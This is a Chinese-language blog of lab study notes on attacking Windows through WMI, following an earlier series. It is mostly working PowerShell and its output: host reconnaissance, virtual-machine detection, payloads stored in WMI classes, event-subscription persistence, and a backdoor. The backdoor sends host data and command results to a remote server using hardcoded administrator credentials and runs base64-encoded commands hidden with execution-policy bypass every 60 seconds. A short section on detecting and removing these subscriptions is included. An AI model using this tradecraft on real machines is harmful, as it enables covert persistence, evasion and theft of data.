Windows-WMI分析及运用(一)
关键词: Windows, 持久化, 漏洞 状态: 进行中
参考链接:
WMI Attacks
https://wooyun.x10sec.org/static/drops/tips-8189.html【本文由三好学生原创并首发于乌云drops】
WMI Backdoor
https://wooyun.x10sec.org/static/drops/tips-8260.html【本文由三好学生原创并首发于乌云drops】
WMI Defense
https://wooyun.js.org/drops/WMI Defense.html【本文由三好学生原创,原文地址:http://drops.wooyun.org/tips/8290】
WMI 相关内容
https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe
WSC、JSRAT and WMI Backdoor
https://wooyun.x10sec.org/static/drops/tips-15575.html
0x00 前言
阅读千遍,不如实践一遍。本文是对三好学生原创文章WMI系列的学习及实践测试记录,仅供学习记录使用。原文链接如上。
0x01 Powershell实现WMI attacks
运行环境
- 目前环境Windows10 至少要求PowerShellV3
相关命令-信息收集
操作系统相关信息
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
SystemDirectory : C:\Windows\system32
Organization :
RegisteredUser : Windows 用户
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Domain : WORKGROUP
Manufacturer : VMware, Inc.
Name : DESKTOP-78M3Q0H
PrimaryOwnerName : Windows 用户
TotalPhysicalMemory : 8588869632
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
Version : INTEL - 6040000
文件/目录列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile
磁盘卷列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume
PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume|findstr "Caption"
Caption : C:\
Caption : E:\
Caption : \\?\Volume{6e506627-7001-4ecc-a1fb-bf533c7cae23}\
Caption : G:\
注册表操作(未测试)
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents
当前进程
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
列举服务
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service
日志
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent
登陆账户
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
__GENUS : 2
__CLASS : Win32_LoggedOnUser
__SUPERCLASS : CIM_Dependency
__DYNASTY : CIM_Dependency
__RELPATH : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
__PROPERTY_COUNT : 2
__DERIVATION : {CIM_Dependency}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\CIMV2
__PATH : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
Antecedent : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent : \\.\root\cimv2:Win32_LogonSession.LogonId="183715"
PSComputerName : DESKTOP-78M3Q0H
__GENUS : 2
__CLASS : Win32_LoggedOnUser
__SUPERCLASS : CIM_Dependency
__DYNASTY : CIM_Dependency
__RELPATH : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
__PROPERTY_COUNT : 2
__DERIVATION : {CIM_Dependency}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\CIMV2
__PATH : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
Antecedent : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent : \\.\root\cimv2:Win32_LogonSession.LogonId="183625"
PSComputerName : DESKTOP-78M3Q0H
共享
Name Path Description
---- ---- -----------
ADMIN$ C:\Windows 远程管理
C$ C:\ 默认共享
E$ E:\ 默认共享
IPC$ 远程 IPC
补丁
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
DESKTOP-78... Security Update KB4570334 2020/9/27 0:00:00
DESKTOP-78... Security Update KB4577266 2020/9/27 0:00:00
杀毒软件
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
__GENUS : 2
__CLASS : AntiVirusProduct
__SUPERCLASS :
__DYNASTY : AntiVirusProduct
__RELPATH : AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
__PROPERTY_COUNT : 6
__DERIVATION : {}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\SecurityCenter2
__PATH : \\DESKTOP-78M3Q0H\ROOT\SecurityCenter2:AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
displayName : Windows Defender
instanceGuid : {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
pathToSignedProductExe : windowsdefender://
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
productState : 397568
timestamp : Fri, 25 Jun 2020 01:35:57 GMT
PSComputerName : DESKTOP-78M3Q0H
相关运用-虚拟机检测
判断物理内存和逻辑内存,似乎不准!
$VMDetected = $False
$Arguments = @{Class = 'Win32_ComputerSystem';Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'}
if (Get-WmiObject @Arguments) { $VMDetected = $True;"In vm"} else{"Not in vm"}
判断虚拟机进程
$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True ;"in vm"} else{"not in vm"}
相关运用-存储payload【管理员权限】
存储
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()
Path : \\DESKTOP-78M3Q0H\ROOT\cimv2:Win32_EvilClass
RelativePath : Win32_EvilClass
Server : DESKTOP-78M3Q0H
NamespacePath : ROOT\cimv2
ClassName : Win32_EvilClass
IsClass : True
IsInstance : False
IsSingleton : False
读取
PS C:\Windows\system32> ([WmiClass] 'Win32_EvilClass').Properties['EvilProperty']
Name : EvilProperty
Value : This is payload
Type : String
IsLocal : True
IsArray : False
Origin : Win32_EvilClass
Qualifiers : {CIMTYPE}
相关运用-隐蔽定时启动程序【管理员权限】
一行
$filterName = 'BotFilter82';$consumerName = 'BotConsumer23';$exePath = 'C:\Windows\System32\notepad.exe';$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query}-ErrorAction Stop;$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath};Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
多行
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query}-ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
结果
__GENUS : 2
__CLASS : __FilterToConsumerBinding
__SUPERCLASS : __IndicationRelated
__DYNASTY : __SystemClass
__RELPATH : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"",Filter="
__EventFilter.Name=\"BotFilter82\""
__PROPERTY_COUNT : 7
__DERIVATION : {__IndicationRelated, __SystemClass}
__SERVER : DESKTOP-78M3Q0H
__NAMESPACE : ROOT\subscription
__PATH : \\DESKTOP-78M3Q0H\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsu
mer.Name=\"BotConsumer23\"",Filter="__EventFilter.Name=\"BotFilter82\""
Consumer : CommandLineEventConsumer.Name="BotConsumer23"
CreatorSID : {1, 5, 0, 0...}
DeliverSynchronously : False
DeliveryQoS :
Filter : __EventFilter.Name="BotFilter82"
MaintainSecurityContext : False
SlowDownProviders : False
PSComputerName : DESKTOP-78M3Q
相关运用-WMI后门检测及清除【管理员权限】
- 查看当前WMI Event
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
- 清除后门
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
- 其他检测方法
– vbs
– mof
– C/C++ via IWbem* COM API
– .NET System.Management classes
查看日志
– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM
0x02 进阶WMI技巧—WMI Backdoor
- 测试环境
server(监听用服务端)
172.16.1.201
win2012x64
username:administrator
password:1qaz!QAZ
client(受控端)
172.16.1.211
win10x64
- 步骤一:Client获取主机配置信息-连接远程服务器-保存在远程服务器(客户端执行)
#连接172.16.1.201
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
#新建类名
$EvilClass['__CLASS'] = 'Win32_UserInfo'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
#获取主机配置信息
$GetOS=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
$GetProcess=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
$GetService=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service -Filter "State='Running'"
$GetUser=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$GetAV=Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
#注:Powershell中换行符为`n
$EvilClass.Properties['IP172161211'].Value =$GetUser.UserName+"`n"+"OS:"+$GetOS.Caption+";"+$GetOS.OSArchitecture+"`n"+"AntiVirusProduct:"+ $GetAV.displayName+"`n"+"Process:"+"`n"+$GetProcess.Name+"`n"+"Service Start:"+"`n"+$GetService.Name
#存储
$EvilClass.Put()
- 步骤一:结果(客户端执行)
Path : \\172.16.1.201\root\cimv2:Win32_UserInfo
RelativePath : Win32_UserInfo
Server : 172.16.1.201
NamespacePath : root\cimv2
ClassName : Win32_UserInfo
IsClass : True
IsInstance : False
IsSingleton : False
- 步骤二:查询(服务端执行)
([WmiClass]'Win32_UserInfo').Properties['IP172161211']
PS C:\Users\admin> ([WmiClass]'Win32_UserInfo').Properties['IP172161211']
Name : IP172161211
Value : MAKAPAKA\Dev1
OS:Microsoft Windows 10 专业版;64 位
AntiVirusProduct:Windows Defender
Process:
System Idle Process System Registry smss.exe csrss.exe csrss.exe wininit.exe winlogon.exe services.exe lsa
ss.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe
svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression sv
chost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe vmtoolsd.exe vm3dservice.exe VGAuthS
ervice.exe MsMpEng.exe vm3dservice.exe svchost.exe dllhost.exe WmiPrvSE.exe msdtc.exe NisSrv.exe MoUsoCore
Worker.exe svchost.exe dasHost.exe svchost.exe sihost.exe svchost.exe taskhostw.exe ctfmon.exe explorer.ex
e ChsIME.exe svchost.exe SearchIndexer.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe Run
timeBroker.exe TextInputHost.exe RuntimeBroker.exe dllhost.exe SecurityHealthSystray.exe SecurityHealthSer
vice.exe vmtoolsd.exe cmd.exe conhost.exe MusNotifyIcon.exe OneDrive.exe SgrmBroker.exe uhssvc.exe svchost
.exe ApplicationFrameHost.exe svchost.exe powershell.exe powershell.exe conhost.exe svchost.exe Microsoft.
Photos.exe RuntimeBroker.exe WmiPrvSE.exe svchost.exe RuntimeBroker.exe smartscreen.exe ChsIME.exe audiodg
.exe
Service Start:
Appinfo AppXSvc AudioEndpointBuilder Audiosrv BFE BrokerInfrastructure BTAGService BthAvctpSvc bthserv CDP
Svc COMSysApp CoreMessagingRegistrar CryptSvc DcomLaunch DeviceAssociationService Dhcp DiagTrack DispBroke
rDesktopSvc Dnscache DoSvc DPS DsSvc DusmSvc EventLog EventSystem fdPHost FDResPub FontCache InstallServic
e iphlpsvc KeyIso LanmanServer LanmanWorkstation LicenseManager lmhosts LSM mpssvc MSDTC NcbService Netlog
on netprofm NlaSvc nsi PcaSvc PlugPlay Power ProfSvc RasMan RmSvc RpcEptMapper RpcSs SamSs Schedule Securi
tyHealthService SEMgrSvc SENS SgrmBroker ShellHWDetection SmsRouter Spooler SSDPSRV SstpSvc StateRepositor
y StorSvc SysMain SystemEventsBroker TabletInputService Themes TimeBrokerSvc TokenBroker TrkWks uhssvc Use
rManager UsoSvc VaultSvc VGAuthService vm3dservice VMTools W32Time WaaSMedicSvc Wcmsvc WdiServiceHost WdiS
ystemHost WdNisSvc WinDefend WinHttpAutoProxySvc Winmgmt WpnService wscsvc WSearch wuauserv cbdhsvc_c66fa
CDPUserSvc_c66fa OneSyncSvc_c66fa PimIndexMaintenanceSvc_c66fa UnistoreSvc_c66fa UserDataSvc_c66fa WpnUser
Service_c66fa
Type : String
IsLocal : True
IsArray : False
Origin : Win32_UserInfo
Qualifiers : {CIMTYPE}
- 步骤三:Client端获取指令并执行
Client加密存储指令
Client读取指令-解密-执行
客户端代码
-
Client加密存储指令 (需要提升权限)
#定义Payload,为保证变量能够解析,需要使用单引号‘ $Payload=@' $Options = New-Object Management.ConnectionOptions $Options.Username = 'makapaka.garden\administrator' $Options.Password = '1qaz!QAZ' $Options.EnablePrivileges = $True $Connection = New-Object Management.ManagementScope $Connection.Path = '\\172.16.1.201\root\cimv2' $Connection.Options = $Options $Connection.Connect() $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null) $EvilClass['__CLASS'] = 'Win32_CommandTest' $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False) $EvilClass.Properties['IP172161211'].Value ="Run Command Test!" $EvilClass.Put() '@ #对payload作base64加密 $bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload); $EncodedPayload = [System.Convert]::ToBase64String($bytes); #存储加密后的payload $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null) $StaticClass.Name = 'Win32_Command' $StaticClass.Put() $StaticClass.Properties.Add('EnCommand' , $EncodedPayload) $StaticClass.Put()
Tip:
Base64转换
$a = ipconfig /all [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($a)) [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($b))
Client加密存储指令,命令执行 (需要提升权限)
#定义Payload,为保证变量能够解析,需要使用单引号‘ $Payload=@' $Options = New-Object Management.ConnectionOptions $Options.Username = 'makapaka.garden\administrator' $Options.Password = '1qaz!QAZ' $Options.EnablePrivileges = $True $Connection = New-Object Management.ManagementScope $Connection.Path = '\\172.16.1.201\root\cimv2' $Connection.Options = $Options $Connection.Connect() $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null) $EvilClass['__CLASS'] = 'Win32_CommandTest' $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False) $command = ipconfig /all $EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command)) $EvilClass.Put() '@ #对payload作base64加密 $bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload); $EncodedPayload = [System.Convert]::ToBase64String($bytes); #存储加密后的payload $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null) $StaticClass.Name = 'Win32_Command' $StaticClass.Put() $StaticClass.Properties.Add('EnCommand' , $EncodedPayload) $StaticClass.Put()
Base64命令执行使用
$command = ipconfig /all $EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command))
Base64服务端解密
$result=([WmiClass] 'Win32_CommandTest').Properties['IP172161211'].Value [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result))
结果
PS C:\Users\admin> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result)) Windows IP 配置 主机名 . . . . . . . . . . . . . : DevC1 主 DNS 后缀 . . . . . . . . . . . : makapaka.garden 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 DNS 后缀搜索列表 . . . . . . . . : makapaka.garden localdomain 以太 网适配器 Ethernet0: 连接特定的 DNS 后缀 . . . . . . . : localdomain 描述. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection 物理地址. . . . . . . . . . . . . : 00-0C-29-6B-36-09 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::95a8:a9a1:1c42:66 bb%9(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.235.135(首选) 子网掩码 . . . . . . . . . . . . : 255.25 5.255.0 获得租约的时间 . . . . . . . . . : 2020年6月28日 9:28:06 租约过期的时间 . . . . . . . . . : 2020年6月28 日 11:43:06 默认网关. . . . . . . . . . . . . : 192.168.235.2 DHCP 服务器 . . . . . . . . . . . : 192.168.235.254 DHCPv6 IAID . . . . . . . . . . . : 100666409 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C- 29-6B-36-09 DNS 服务器 . . . . . . . . . . . : 192.168.235.2 主 WINS 服务器 . . . . . . . . . : 192.168.235.2 TCPIP 上的 NetBIOS . . . . . . . : 已启用 以太网适配器 Ethernet1: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2 物理地址. . . . . . . . . . . . . : 00- 0C-29-6B-36-13 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地 址. . . . . . . . : fe80::3419:de22:d5d:d52d%13(首选) IPv4 地址 . . . . . . . . . . . . : 172.16.1.211(首选) 子 网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 172.16.1.201 DHCPv6 IAID . . . . . . . . . . . : 419433513 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-29-6B-36-09 DNS 服务器 . . . . . . . . . . . : 172.16.1.201 TCPIP 上的 NetBIOS . . . . . . . : 已启用 以太网适配器 蓝牙网络连接: 媒体状态 . . . . . . . . . . . . : 媒体已断开连接 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Bluetooth Device (Personal Area Network) 物理地址. . . . . . . . . . . . . : A8-7E-EA-E9-D7-06 DHC P 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . :
结果
PS C:\Windows\system32> $StaticClass.Put() Path : \\DEVC1\ROOT\cimv2:Win32_Command RelativePath : Win32_Command Server : DEVC1 NamespacePath : ROOT\cimv2 ClassName : Win32_Command IsClass : True IsInstance : False IsSingleton : False
-
Client查看加密的payload
([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
结果
PS C:\Windows\system32> ([WmiClass] 'Win32_Command').Properties['EnCommand'] Name : EnCommand Value : JABPAHAAdABpAG8AbgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQwBvAG4AbgBlAGMAdA BpAG8AbgBPAHAAdABpAG8AbgBzAAoAJABPAHAAdABpAG8AbgBzAC4AVQBzAGUAcgBuAGEAbQBlACAAPQAgACcAbQBhAGsAYQBwAGEAawBh AC4AZwBhAHIAZABlAG4AXABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcACgAkAE8AcAB0AGkAbwBuAHMALgBQAGEAcwBzAHcAbwByAG QAIAA9ACAAJwAxAHEAYQB6ACEAUQBBAFoAJwAKACQATwBwAHQAaQBvAG4AcwAuAEUAbgBhAGIAbABlAFAAcgBpAHYAaQBsAGUAZwBlAHMA IAA9ACAAJABUAHIAdQBlAAoAJABDAG8AbgBuAGUAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQ BtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABTAGMAbwBwAGUACgAkAEMAbwBuAG4AZQBjAHQAaQBvAG4ALgBQAGEAdABoACAAPQAg ACcAXABcADEANwAyAC4AMQA2AC4AMQAuADIAMAAxAFwAcgBvAG8AdABcAGMAaQBtAHYAMgAnAAoAJABDAG8AbgBuAGUAYwB0AGkAbwBuAC 4ATwBwAHQAaQBvAG4AcwAgAD0AIAAkAE8AcAB0AGkAbwBuAHMACgAkAEMAbwBuAG4AZQBjAHQAaQBvAG4ALgBDAG8AbgBuAGUAYwB0ACgA KQAKACQARQB2AGkAbABDAGwAYQBzAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbg BhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACQAQwBvAG4AbgBlAGMAdABpAG8AbgAsACAAWwBTAHQAcgBpAG4AZwBdADoAOgBFAG0AcAB0 AHkALAAgACQAbgB1AGwAbAApAAoAJABFAHYAaQBsAEMAbABhAHMAcwBbACcAXwBfAEMATABBAFMAUwAnAF0AIAA9ACAAJwBXAGkAbgAzAD IAXwBDAG8AbQBtAGEAbgBkAFQAZQBzAHQAJwAKACQARQB2AGkAbABDAGwAYQBzAHMALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AQQBkAGQA KAAnAEkAUAAxADcAMgAxADYAMQAyADEAMQAnACwAIABbAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBDAGkAbQBUAHkAcABlAF0AOgA6AFMAdA ByAGkAbgBnACwAIAAkAEYAYQBsAHMAZQApAAoAJABFAHYAaQBsAEMAbABhAHMAcwAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEkAUAAx ADcAMgAxADYAMQAyADEAMQAnAF0ALgBWAGEAbAB1AGUAIAA9ACIAUgB1AG4AIABDAG8AbQBtAGEAbgBkACAAVABlAHMAdAAhACIAIAAKAC QARQB2AGkAbABDAGwAYQBzAHMALgBQAHUAdAAoACkAIAA= Type : String IsLocal : True IsArray : False Origin : Win32_Command Qualifiers : {CIMTYPE}
-
Client读取指令-解密-执行
#读取加密payload $EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value #PowerShell执行命令 $PowerShellPayload = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload" Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload #显示解密指令 $bytes2 = [System.Convert]::FromBase64String($EncodedPayload); $decoded = [System.Text.Encoding]::Unicode.GetString($bytes2); "decoded Payload:" $decoded
PS C:\Windows\system32> $decoded $Options = New-Object Management.ConnectionOptions $Options.Username = 'makapaka.garden\administrator' $Options.Password = '1qaz!QAZ' $Options.EnablePrivileges = $True $Connection = New-Object Management.ManagementScope $Connection.Path = '\\172.16.1.201\root\cimv2' $Connection.Options = $Options $Connection.Connect() $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null) $EvilClass['__CLASS'] = 'Win32_CommandTest' $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False) $EvilClass.Properties['IP172161211'].Value ="Run Command Test!" $EvilClass.Put()
-
Server端执行查看结果
([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
PS C:\Users\admin> ([WmiClass] 'Win32_CommandTest').Properties['IP172161211'] Name : IP172161211 Value : Run Command Test! Type : String IsLocal : Trueserver端执行 IsArray : False Origin : Win32_CommandTest Qualifiers : {CIMTYPE}
-
Client定时执行powershell命令
#读取加密指令 $EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value $filterName = 'BotFilter56' $consumerName = 'BotConsumer56' #创建一个__EventFilter,用于设定触发条件,每隔60s执行一次 $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop #创建一个CommandLineEventConsumer,用于设定执行的操作 $Arg =@{ Name=$consumerName CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -enc $EncodedPayload" } $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg #用于绑定filter和consumer Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
PS C:\Windows\system32> Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} __GENUS : 2 __CLASS : __FilterToConsumerBinding __SUPERCLASS : __IndicationRelated __DYNASTY : __SystemClass __RELPATH : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer56\"",Filter=" __EventFilter.Name=\"BotFilter56\"" __PROPERTY_COUNT : 7 __DERIVATION : {__IndicationRelated, __SystemClass} __SERVER : DEVC1 __NAMESPACE : ROOT\subscription __PATH : \\DEVC1\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\ "BotConsumer56\"",Filter="__EventFilter.Name=\"BotFilter56\"" Consumer : CommandLineEventConsumer.Name="BotConsumer56" CreatorSID : {1, 5, 0, 0...} DeliverSynchronously : False DeliveryQoS : Filter : __EventFilter.Name="BotFilter56" MaintainSecurityContext : False SlowDownProviders : False PSComputerName : DEVC1
检测方法:@0x04 相关运用-WMI后门检测及清除【管理员权限】
WMI Backdoor 相关知识(对于定时启动功能的进一步说明)
1、EventFilter—可以理解为通过执行WQL查询来设定触发条件,包括以下查询:
(1)Data queries
SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application
(2)Event queries
SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance._Class = 'win32_TerminalService'
(3)Schema queries
SELECT * FROM meta_class WHERE __this ISA "Win32_BaseService"
2、 consumer—可以理解为条件满足后执行的操作,包括如下查询:
(1)ActiveScriptEventConsumer
(2)LogFileEventConsumer
(3)NTEventLogEventConsumer
(4)SMTPEventConsumer
(5)CommandLineEventConsumer
3、使用consumer执行vbs脚本的两种方式
(1)直接执行现有脚本
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptFileName = "c:\\asec2.vbs";
};
(2)内嵌脚本,不会留下痕迹
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
"Dim objFS, objFile\n"
"Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n"
